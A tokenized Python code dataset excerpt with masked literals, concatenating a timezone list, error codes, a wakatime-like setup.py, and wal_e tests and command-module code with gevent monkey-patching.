<EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> all_timezones = LazyList ( <EOL> tz for tz in all_timezones if resource_exists ( tz ) ) <EOL> all_timezones_set = LazySet ( all_timezones ) <EOL> common_timezones = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> common_timezones = LazyList ( <EOL> tz for tz in common_timezones if tz in all_timezones ) <EOL> common_timezones_set = LazySet ( common_timezones ) </s>
<s> """<STR_LIT>""" <EOL> SUCCESS = <NUM_LIT:0> <EOL> API_ERROR = <NUM_LIT> <EOL> CONFIG_FILE_PARSE_ERROR = <NUM_LIT> <EOL> AUTH_ERROR = <NUM_LIT> <EOL> UNKNOWN_ERROR = <NUM_LIT> <EOL> MALFORMED_HEARTBEAT_ERROR = <NUM_LIT> </s>
<s> from setuptools import setup <EOL> from wakatime . __about__ import ( <EOL> __author__ , <EOL> __author_email__ , <EOL> __description__ , <EOL> __license__ , <EOL> __title__ , <EOL> __url__ , <EOL> __version__ , <EOL> ) <EOL> packages = [ <EOL> __title__ , <EOL> ] <EOL> setup ( <EOL> name = __title__ , <EOL> version = __version__ , <EOL> license = __license__ , <EOL> description = __description__ , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> author = __author__ , <EOL> author_email = __author_email__ , <EOL> url = __url__ , <EOL> packages = packages , <EOL> package_dir = { __title__ : __title__ } , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } , <EOL> classifiers = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) , <EOL> ) </s>
<s> import errno <EOL> import os <EOL> import pytest <EOL> from fast_wait import fast_wait <EOL> from wal_e import piper <EOL> from wal_e import subprocess <EOL> assert fast_wait <EOL> def invoke_program ( ) : <EOL> with open ( os . devnull , '<STR_LIT:w>' ) as devnull : <EOL> piper . popen_sp ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = devnull , stderr = devnull ) <EOL> def test_normal ( ) : <EOL> invoke_program ( ) <EOL> class OomTimes ( object ) : <EOL> def __init__ ( self , real , n ) : <EOL> self . real = real <EOL> self . n = n <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> if self . n == <NUM_LIT:0> : <EOL> self . real ( * args , ** kwargs ) <EOL> else : <EOL> self . n -= <NUM_LIT:1> <EOL> e = OSError ( '<STR_LIT>' ) <EOL> e . errno = errno . ENOMEM <EOL> raise e <EOL> def pytest_generate_tests ( metafunc ) : <EOL> if "<STR_LIT>" in metafunc . funcargnames : <EOL> scenarios = [ OomTimes ( subprocess . Popen , n ) for n in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:10> ] ] <EOL> metafunc . parametrize ( "<STR_LIT>" , scenarios ) <EOL> def test_low_mem ( oomtimes , monkeypatch ) : <EOL> monkeypatch . setattr ( subprocess , '<STR_LIT>' , oomtimes ) <EOL> invoke_program ( ) <EOL> def test_advanced_shim ( oomtimes , monkeypatch ) : <EOL> monkeypatch . setattr ( subprocess , '<STR_LIT>' , oomtimes ) <EOL> old_n = oomtimes . n <EOL> def reset ( ) : <EOL> oomtimes . n = old_n <EOL> def invoke ( max_tries ) : <EOL> with open ( os . devnull , '<STR_LIT:w>' ) as devnull : <EOL> popen = piper . PopenShim ( sleep_time = <NUM_LIT:0> , max_tries = max_tries ) <EOL> popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = devnull , stderr = devnull ) <EOL> if oomtimes . n >= <NUM_LIT:1> : <EOL> with pytest . raises ( OSError ) as e : <EOL> invoke ( oomtimes . n - <NUM_LIT:1> ) <EOL> assert e . value . errno == errno . ENOMEM <EOL> else : <EOL> invoke ( oomtimes . n - <NUM_LIT:1> ) <EOL> reset ( ) <EOL> invoke ( oomtimes . n ) <EOL> reset ( ) <EOL> invoke ( oomtimes . n + <NUM_LIT:1> ) <EOL> reset ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> def gevent_monkey ( * args , ** kwargs ) : <EOL> import gevent . monkey <EOL> gevent . monkey . patch_os ( ) <EOL> gevent . monkey . patch_socket ( dns = True , aggressive = True ) <EOL> gevent . monkey . patch_ssl ( ) <EOL> gevent . monkey . patch_time ( ) <EOL> gevent_monkey ( ) <EOL> if sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> def getresponse_monkey ( ) : <EOL> import httplib <EOL> original = httplib . HTTPConnection . getresponse <EOL> def monkey ( * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> return original ( * args , ** kwargs ) <EOL> httplib . HTTPConnection . getresponse = monkey <EOL> getresponse_monkey ( ) <EOL> def ssl_monkey ( ) : <EOL> import ssl <EOL> original = ssl . wrap_socket <EOL> def wrap_socket_monkey ( * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return original ( * args , ** kwargs ) <EOL> ssl . wrap_socket = wrap_socket_monkey <EOL> ssl_monkey ( ) <EOL> import argparse <EOL> import logging <EOL> import os <EOL> import re <EOL> import textwrap <EOL> import traceback <EOL> from wal_e import log_help <EOL> from wal_e import subprocess <EOL> from wal_e . exception import UserCritical <EOL> from wal_e . exception import UserException <EOL> from wal_e import storage <EOL> from wal_e . piper import popen_sp <EOL> from wal_e . worker . pg import PSQL_BIN , psql_csv_run <EOL> from wal_e . pipeline import LZOP_BIN , PV_BIN , GPG_BIN <EOL> from wal_e . worker . pg import CONFIG_BIN , PgControlDataParser <EOL> log_help . configure ( <EOL> format = '<STR_LIT>' ) <EOL> logger = log_help . WalELogger ( '<STR_LIT>' ) <EOL> def external_program_check ( <EOL> to_check = frozenset ( [ PSQL_BIN , LZOP_BIN , PV_BIN ] ) ) : <EOL> """<STR_LIT>""" <EOL> could_not_run = [ ] <EOL> error_msgs = [ ] <EOL> def psql_err_handler ( popen ) : <EOL> assert popen . returncode != 